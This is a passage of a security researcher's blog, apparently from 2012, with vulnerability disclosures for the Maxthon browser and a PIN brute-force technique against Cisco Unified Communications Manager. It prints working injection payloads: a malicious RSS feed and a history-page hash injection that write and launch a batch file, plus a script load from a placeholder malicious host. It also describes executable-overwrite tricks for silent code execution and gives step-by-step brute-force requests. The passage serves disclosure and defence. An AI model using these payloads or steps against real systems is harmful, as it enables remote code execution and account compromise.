<i>window.external.addFavorite("www.google.com","yourpaddinghere'><scri"+"pt>"+evilpayload+"</"+"script>andpaddinghere");</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span></code></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span></body></i><br />
<i></html></i><br />
<div>
<br /></div>
<br />
<b>Video</b><br />
<br />
Maxthon - Cross Context Scripting (XCS) - Bookmark Toolbar and Bookmark Sidebar<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/YR0RQz45t3M?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<br />
13/02/2012 - Bug reported to multiple contacts<br />
21/02/2012 - Reception of report confirmed but no further reply<br />
21/02/2012 - Chased vendors - no reply<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comtag:blogger.com,1999:blog-5593108060941425908.post-64061346416810420052012-12-05T20:25:00.001+01:002012-12-05T20:25:15.683+01:00Maxthon - Privileged API Available On i.maxthon.com<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /><br /><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December, 6 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.4.5.2000 and previous versions<br />
Status: Patched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
<br />
<br />
<br />
<b>Privileged APIs Available on i.maxthon.com</b><br />
<br />
The web site i.maxthon.com can access and use privileged Maxthon DOM object (e.g. maxthon.*). Such Maxthon object interfaces can be used to read last visited pages or favorites, as shown in the following screen shot. Such information can only be retrieved by using privileged Maxthon functions.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhbJzALfZagjT7fNww0Qm-V-IFDr6IfuJJWTm8BSOBTsTzinEDeKSXPmbjTIqD4Iqp6m2iLoCFpF-WgU3MZrWn6GLYnOvEHaEByd0Zytd-pFev5f4SRPe0y-2kz1asqGjyy-Bf4Fx496w/s1600/s11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhbJzALfZagjT7fNww0Qm-V-IFDr6IfuJJWTm8BSOBTsTzinEDeKSXPmbjTIqD4Iqp6m2iLoCFpF-WgU3MZrWn6GLYnOvEHaEByd0Zytd-pFev5f4SRPe0y-2kz1asqGjyy-Bf4Fx496w/s1600/s11.png" /></a></div>
<br />
Different issues were identified regarding this design:<br />
<ol>
<li>No control on resolution of IP address for i.maxthon.com domain;</li>
<li>No use of SSL to serve the i.maxthon.com web site;</li>
<li>Use of icon "Trusted site" on the URL bar even when i.maxthon.com resolves to a different IP address.</li>
</ol>
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways, as listed below:<br />
<ul>
<li>DNS poisoning - Force resolution of i.maxthon.com to a controlled IP address</li>
<li>HTTP MiTM attack - malicious proxy which alters page content</li>
<li>Exploit XSS vulnerability in real i.maxthon.com site</li>
</ul>
Once it is possible to successfully perform one of the above attacks, then it would be possible to access Maxthon native JavaScript privileged functions which can be invoked from the Maxthon DOM object (e.g. maxthon.*). Such Maxthon object interfaces can be used to read and write from the file system, as well as execute arbitrary commands, steal stored passwords, or modify Maxthon configuration.<br />
<div>
<br /></div>
<b>Video</b><br />
<br />
Maxthon - i.maxthon.com (DNS compromise scenario)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/1IqZBS0O2Hs?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comtag:blogger.com,1999:blog-5593108060941425908.post-68175278930293201962012-12-05T20:22:00.001+01:002012-12-05T20:22:17.220+01:00Maxthon - Cross Context Scripting (XCS) - RSS - Remote Code Execution<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December, 5 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.4.5.2000 and previous versions<br />
Status: Unpatched (at the time of publishing)<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf">Maxthon_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Cross Context Scripting</b><br />
<br />
<a href="http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/">Cross Context Scripting</a> (XCS) is a particular code injection attack vector where the injection occurs from an untrusted zone (e.g. Internet) into a privileged browser zone. In this case, it is possible to inject arbitrary JavaScript/HTML code from an untrusted page into Maxthon browser privileged zone - mx://res/*.<br />
<br />
<br />
<b>Description</b><br />
<br />
A malicious user can inject arbitrary JavaScript/HTML code via multiple RSS feed elements. Vulnerable elements are the following:<br />
<br />
<ul>
<li><b><span style="color: red;"><title></span></b> element:<span class="Apple-tab-span" style="white-space: pre;"> </span>JavaScript injection using HTML encoded payload</li>
<li><span style="color: red;"><b><link></b></span> element:<span class="Apple-tab-span" style="white-space: pre;"> </span>JavaScript injection using javascript: pseudouri</li>
<li><span style="color: red;"><b><description></b></span> element: JavaScript injection using HTML encoded payload</li>
</ul>
<br />
Injection is possible in two different conditions:<br />
<br />
<b>[1] User directly visits a malicious RSS page: e.g. http://x.x.x.x/maliciousrss.xml</b><br />
<br />
In such case, the injection is rendered in the following point: mx://res/app/%7BGUID%7B/preview.htm?http://x.x.x.x/maliciousrss.xml<br />
<br />
<b>[2] User views or saves the malicious feed using Maxthon Feed Reader built-in component.</b><br />
<br />
The Feed Reader is located at about:reader which is mapped to mx://res/app/%7BGUID%7B/reader.htm page. If the malicious feed is saved, injection is stored as well within the about:reader page.<br />
<br />
Maxthon has to render the attack page in "UltraMode" to be affected by this vulnerability. The UltraMode is automatically set by default in Maxthon and makes use of Webkit.<br />
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways. As the injection point is in the mx://res/ privileged browser zone, it is possible to bypass Same Origin Policy (SOP) protections, and also access Maxthon native JavaScript privileged functions which can be invoked from the Maxthon DOM object (e.g. maxthon.*). Such Maxthon object interfaces can be used to read and write from the file system, as well as execute arbitrary commands, steal stored passwords, or modify Maxthon configuration.<br />
<br />
A malicious user would need to convince a user to visit a link to exploit this vulnerability.<br />
<br />
<b>Malicious RSS Feed – Arbitrary Code Execution Exploit</b><br />
<br />
<br />
<?xml version='1.0' encoding="ISO-8859-1"?><br />
<rss version='2.0'><br />
<channel><br />
<description>Malerisch.net</description><br />
<link>http://blog.malerisch.net/</link><br />
<title>Malerisch.net</title><br />
<item><br />
<title>test'&gt;&lt;img src=a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")';&gt;</title><br />
<link>javascript:alert(window.location);</link><br />
<description>07/09/2008 - test &lt;img src=a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")';&gt;</description><br />
<span class="Apple-tab-span" style="white-space: pre;"> </span><pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate><br />
</item><br />
</channel><br />
</rss><br />
<div>
<br /></div>
<br />
<b>Metasploit module</b><br />
<br />
Following disclosure of the bugs during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">HITB2012AMS conference</a>, it was observed that the maxthon.program object was silently removed by Maxthon in recent versions. This only allows a malicious user to read and write files on the system.<br />
<br />
Code execution without incurring in a warning or user prompt can still be achieved by overwriting an executable which can be called directly by the browser. A "dirty" way is to overwrite j2plauncher.exe assuming the victim has either JRE/JDK installed on the machine. The second step would be to force Maxthon to load java.exe (e.g. create an iframe that points to a page which loads a Java Applet). This approach was successfully tested on Windows 7.<br />
<br />
On Windows XP, there are more choices to overwrite executable files, e.g. C:\\Program\ Files\\Outlook\ Express\\wab.exe and then force browser to invoke wab.exe via window.location='ldap://dummy'.<br />
<br />
The PoC Metasploit module includes the "dirty" Java overwrite approach described above.<br />
<br />
<a href="https://github.com/malerisch/metasploit-framework/blob/maxthon3/modules/exploits/windows/browser/maxthon_rss_xcs.rb">https://github.com/malerisch/metasploit-framework/blob/maxthon3/modules/exploits/windows/browser/maxthon_rss_xcs.rb</a><br />
<br />
<b>Video</b><br />
<br />
Maxthon - Cross Context Scripting (XCS) - RSS - Java overwrite technique - Metasploit in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/d-55asVLqNI?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<b>Timeline</b></div>
<br />
13/02/2012 - Bug reported to multiple contacts<br />
21/02/2012 - Reception of report confirmed but no further reply<br />
21/02/2012 - Chased vendors - no reply<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-71753747914613037482012-12-05T20:19:00.000+01:002012-12-05T20:19:17.096+01:00Maxthon - Cross Context Scripting (XCS) - about:history - Remote Code Execution<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December, 5 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.4.5.2000 and previous versions<br />
Status: Unpatched (at the time of publishing)<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf">Maxthon_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Cross Context Scripting</b><br />
<br />
<a href="http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/">Cross Context Scripting</a> (XCS) is a particular code injection attack vector where the injection occurs from an untrusted zone (e.g. Internet) into a privileged browser zone. In this case, it is possible to inject arbitrary JavaScript/HTML code from an untrusted page into Maxthon browser privileged zone - mx://res/*.<br />
<br />
<br />
<b>Description</b><br />
<br />
A malicious user can inject arbitrary JavaScript/HTML code through the websites visited with the Maxthon browser. The code injection is rendered into the History page (about:history), which displays URL and a short description of the visited pages. A malicious user can inject JavaScript/HTML content by using the location.hash property, as shown below:<br />
<br />
http://x.x.x.x/maliciouspage.html<b><span style="color: red;">#"><img src=a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")'></span></b><br />
<br />
Injected payload is rendered in both the <img> and <a> elements of a history item, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRmc75loXYkXUpMjd6DpSXiFKJSljSIkRDGQaxcZ76NsPapArJ97WEm2L1evGKn8IK0xfYjeaImF_g94grEE7s0G2qjeT83DwOH2cjDIV-ivwnp7z0J2LptiL8pr-OcY9GvwePZrHk0Qs/s1600/maxthon_xcs_inj1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRmc75loXYkXUpMjd6DpSXiFKJSljSIkRDGQaxcZ76NsPapArJ97WEm2L1evGKn8IK0xfYjeaImF_g94grEE7s0G2qjeT83DwOH2cjDIV-ivwnp7z0J2LptiL8pr-OcY9GvwePZrHk0Qs/s1600/maxthon_xcs_inj1.png" /></a></div>
<br />
<br />
Most recently, only a single injection point is possible after some silent fixes from Maxthon. The about:history is mapped to mx://res/history/index.htm, as shown in the screen shot below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicTSRHIIwy1g9D1Secr5lgmTRzW9V0WCn2bfCuQhpZh_PBUi8b7Dm-XaQcOX6rhccRoB6Aau8iq_1JCG3bZIEa6fb3XnhFfMC9EOLq2hxHA-QVsHVmyPjeJeX3TUFQusNPanK5KeozJ7M/s1600/xcs_abouthistory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicTSRHIIwy1g9D1Secr5lgmTRzW9V0WCn2bfCuQhpZh_PBUi8b7Dm-XaQcOX6rhccRoB6Aau8iq_1JCG3bZIEa6fb3XnhFfMC9EOLq2hxHA-QVsHVmyPjeJeX3TUFQusNPanK5KeozJ7M/s320/xcs_abouthistory.png" width="320" /></a></div>
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways. As the injection point is in the mx://res/ privileged browser zone, it is possible to bypass Same Origin Policy (SOP) protections, and also access Maxthon native JavaScript privileged functions which can be invoked from the Maxthon DOM object (e.g. maxthon.*). Such Maxthon object interfaces can be used to read and write from the file system, as well as execute arbitrary commands, steal stored passwords, or modify Maxthon configuration.<br />
<br />
A malicious user would need to convince a user to visit a link to exploit this vulnerability.<br />
<br />
The exploitation is divided into three phases:<br />
<br />
<b>[1] Create an entry in the history page which contains the injection - injection via location.hash</b><br />
<i><br /></i>
<i>http://x.x.x.x/maliciouspage.html<b><span style="color: red;">#<script src=http://malicious/malicious.js></script></span></b></i><br />
<br />
<b>[2] Redirect browser to the about:history page to trigger execution in the Maxthon trusted zone maliciouspage.html would contain something as:</b><br />
<i><br /></i>
<i><body><script>window.location='<b><span style="color: red;">about:history</span></b>';</script></body></i><br />
<br />
Note this redirection should not occur since it is invoked from a page on the Internet (http://) - due to the protocol mismatch, same-origin policy should trigger.<br />
<br />
<b>[3] Invoke privileged Maxthon DOM API interfaces/objects to achieve remote code execution</b><br />
<br />
From the about:history which is mapped to the mx:// it is possible to invoke special DOM API interfaces and objects, such as maxthon.io and maxthon.program. These special objects can be misused to achieve code execution.<br />
<br />
<b>Metasploit module</b><br />
<br />
Following disclosure of the bugs during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">HITB2012AMS conference</a>, it was observed that the maxthon.program object was silently removed by Maxthon in recent versions. This only allows a malicious user to read and write files on the system.<br />
<br />
Code execution without incurring in a warning or user prompt can still be achieved by overwriting an executable which can be called directly by the browser. A "dirty" way is to overwrite j2plauncher.exe assuming the victim has either JRE/JDK installed on the machine. The second step would be to force Maxthon to load java.exe (e.g. create an iframe that points to a page which loads a Java Applet). This approach was successfully tested on Windows 7.<br />
<br />
On Windows XP, there are more choices to overwrite executable files, e.g. C:\\Program\ Files\\Outlook\ Express\\wab.exe and then force browser to invoke wab.exe via window.location='ldap://dummy'.<br />
<br />
The PoC Metasploit module includes the "dirty" Java overwrite approach described above.<br />
<br />
<a href="https://github.com/malerisch/metasploit-framework/blob/maxthon3/modules/exploits/windows/browser/maxthon_history_xcs.rb">https://github.com/malerisch/metasploit-framework/blob/maxthon3/modules/exploits/windows/browser/maxthon_history_xcs.rb</a><br />
<br />
<b>Video</b><br />
<br />
Maxthon - Cross Context Scripting (XCS) - about:history - Java overwrite technique - Metasploit in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/2wiJKP5mbyQ?feature=player_embedded' frameborder='0'></iframe></div>
<b><br /></b>
Maxthon - Cross Context Scripting (XCS) - about:history - maxthon.program technique - Metasploit in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/N-5BkgJX8sI?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<b><br /></b>
<b>Timeline</b><br />
<br />
13/02/2012 - Bug reported to multiple contacts<br />
21/02/2012 - Reception of report confirmed but no further reply<br />
21/02/2012 - Chased vendors - no reply<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comtag:blogger.com,1999:blog-5593108060941425908.post-86208390554411971592012-10-01T12:33:00.002+02:002012-10-01T12:33:54.749+02:00Cisco Unified Communications Manager (Call Manager) PIN brute force attack<br />
During a security review, I have found a quick way to perform PIN brute force attack against accounts registered with a Cisco Unified Communications Manager (CallManager). A quick google "callmanager brute force" didn't bring any relevant results, so I thought to share the simple technique I have used.<br />
<br />
When looking at the phone handset configuration, some URLs are set to allow the handset to retrieve Personal Address Book details or access the Fast Dials. That caught my attention and I immediately pointed my web proxy to those URLs, forgetting about the handset interface.<br />
<br />
What happens when using the handset is that the handset itself performs HTTP requests to the CallManager.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Hi3S7b295cvgL1iTb8bEEcchvFBewL0JRy8eR8PTgc60MzaUTt9tUwvpJ61dCQvOvaxHeV9Zx4beE9zwBt4GGdP-7_wMSIvjrYFs4kqoIZP99Np_-lJsk77D1hDmdsr-pdNsDiIEWHw/s1600/Cisco+IP+Phone+CP-7961.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Hi3S7b295cvgL1iTb8bEEcchvFBewL0JRy8eR8PTgc60MzaUTt9tUwvpJ61dCQvOvaxHeV9Zx4beE9zwBt4GGdP-7_wMSIvjrYFs4kqoIZP99Np_-lJsk77D1hDmdsr-pdNsDiIEWHw/s400/Cisco+IP+Phone+CP-7961.jpg" width="298" /></a></div>
<br />
<br />
A simple HTTP GET request is performed by the handset to initiate the login sequence with a request as the one below:<br />
<br />
<pre class="brush:text;" name="code" style="font-family: Arial,Helvetica,sans-serif;">1) GET - https://x.x.x.x/ccmpd/pdCheckLogin.do?name=undefined
</pre>
<br />
The response contains a reference to the login.do page along with a "sid" token, which is used in the subsequent requests, as shown in the response below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3HSTqSYjRXGDewwdnrnAzEp9Bqsm4tKBFxs_5tgB_jCkxwNprOyJUfWDlTRvE5G-aM9m-6P_eeybIUazJAg4XQcpnDlfzQE8w1DiJPBI3pdneCi53YW0Kx0krVOxKzAhq2kDE_35oEE/s1600/valid_sid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3HSTqSYjRXGDewwdnrnAzEp9Bqsm4tKBFxs_5tgB_jCkxwNprOyJUfWDlTRvE5G-aM9m-6P_eeybIUazJAg4XQcpnDlfzQE8w1DiJPBI3pdneCi53YW0Kx0krVOxKzAhq2kDE_35oEE/s640/valid_sid.png" width="640" /></a></div>
<br />
<br />
The sid token is required to perform the PIN brute force attack.<br />
<br />
Also, the response provides some clues on which parameters to include in the login request, such as userID and PIN. The following GET request can then be used to perform a PIN brute force account.<br />
<br />
<pre class="brush:text;" name="code" style="font-family: Arial,Helvetica,sans-serif;">2) GET - https://x.x.x.x/ccmpd/login.do?sid=_sid_value_&userid=_userid_&pin=_PIN_
</pre>
<br />
At this stage, it is possible to perform a PIN brute force attack, as a valid SID token needs to be passed when authenticating the user.<br />
<br />
In case the userid/PIN are wrong, the following response is returned:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlxSq59_w2hRzztk_74nZSk-VBnpXkqCasJn9gdcpUkBwzUBmm-INCYIaqcIA-NURpmUjaJ29FIhpy9ZvG8edpdQT6J4WlaGhcRAtPW47piMwvYYDmhmKv72Wwo5dejdUa_Q6J1yQdD8M/s1600/error_message.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlxSq59_w2hRzztk_74nZSk-VBnpXkqCasJn9gdcpUkBwzUBmm-INCYIaqcIA-NURpmUjaJ29FIhpy9ZvG8edpdQT6J4WlaGhcRAtPW47piMwvYYDmhmKv72Wwo5dejdUa_Q6J1yQdD8M/s1600/error_message.png" /></a></div>
<br />
It seems not possible to perform userID enumeration. In such case, it is recommended to have a large username dictionary file and then try against the same PIN (e.g. common value 1234, 12345). This can be easily done using the Burp intruder tab, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPMHGo3DRJYKeE_elWizS8ecJy7-1ic0pWpmJiwJYH9VW9t8Qe8CzHysJBnubBQjlJvNfFoXMBZa7iUiAfRUBYJ8oxXR63dFRlxoodKOxZA1IWG5sprlxEBgMkSe2nJEtsshw9Jt0KQ6c/s1600/horizontal_pin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPMHGo3DRJYKeE_elWizS8ecJy7-1ic0pWpmJiwJYH9VW9t8Qe8CzHysJBnubBQjlJvNfFoXMBZa7iUiAfRUBYJ8oxXR63dFRlxoodKOxZA1IWG5sprlxEBgMkSe2nJEtsshw9Jt0KQ6c/s640/horizontal_pin.png" width="640" /></a></div>
<br />
<br />
If the correct userID/PIN are found, the response will contain links for each service, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6FUbWcEbj24jAlttGFHKsiGombxgTB7qDS4B2TdL2lKRKVNe-bGPP1hJ8geC1FQ6Q-vTc0JbSyhSwhaAkCKcNA5rhZDt5MtR-nTvPVKfeLERWVmm8E_maTRrhCZPtHd2BBGwQBdc19ts/s1600/voip_links_clean.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6FUbWcEbj24jAlttGFHKsiGombxgTB7qDS4B2TdL2lKRKVNe-bGPP1hJ8geC1FQ6Q-vTc0JbSyhSwhaAkCKcNA5rhZDt5MtR-nTvPVKfeLERWVmm8E_maTRrhCZPtHd2BBGwQBdc19ts/s640/voip_links_clean.png" width="640" /></a></div>
<pre class="brush:text; highlight:[]" name="code" style="font-family: Arial,Helvetica,sans-serif;"></pre>
<br />
The above sequence of requests can be trivially automated with a web proxy, such as Burp, by setting a macro for instance.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHVBqD70geNI6OAV8DQGJwXViseaqezJt4tC4jYTBZHjfC32TpL-1uzq-qsps3To1FP6FXhRKJ7VdGv19N0XNWMyIvD1Y_NuicfQzXA98iZYcz7uz8qF0OIDbKA_xX2kklTwdQkYSsA70/s1600/macro_setup.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHVBqD70geNI6OAV8DQGJwXViseaqezJt4tC4jYTBZHjfC32TpL-1uzq-qsps3To1FP6FXhRKJ7VdGv19N0XNWMyIvD1Y_NuicfQzXA98iZYcz7uz8qF0OIDbKA_xX2kklTwdQkYSsA70/s640/macro_setup.png" width="640" /></a></div>
<br />
<br />
More information on how to configure macros in Burp, can be found here: <a href="http://portswigger.net/burp/help/options_sessions_macroeditor.html">http://portswigger.net/burp/help/options_sessions_macroeditor.html</a><br />
<br />
If a valid userID/PIN is found, it is recommended to stop the brute force attack, generate a new sid token and then restart the brute force attack.<br />
<br />
Happy hacking!Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com9tag:blogger.com,1999:blog-5593108060941425908.post-36841969777242387352012-06-08T06:59:00.001+02:002012-06-08T06:59:44.608+02:00Hack In the Box 2012 Amsterdam - Recap<div class="separator" style="clear: both; text-align: center;">
<a href="http://conference.hitb.org/hitbsecconf2012ams/"><img border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Iyk-4hvBEninAXIcobx15JjPz41Xypab7in7qHOtgbhUecK5WXaDMzf9OjXJ-IR8VOHc8ItHrhnzhsGrsnhs5l7t-OOtUdFxL7PAthyphenhyphenHbi51LExy9s-Z-fLsW6YkS6KY6SLrhqI1c70/s400/logo.jpg" width="400" /></a></div>
<br />
